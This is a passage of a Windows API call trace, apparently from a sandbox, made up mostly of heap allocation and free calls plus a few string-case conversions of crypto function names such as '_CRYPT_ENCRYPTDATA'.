RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17561) returned 0x8affc0 [0033.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0033.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.732] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.732] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.732] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17561) returned 0x8affc0 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0033.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17561) returned 0x935008 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.734] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.734] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.735] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da248 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.735] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0033.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.736] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0033.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.736] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0033.737] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0033.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0033.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.738] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 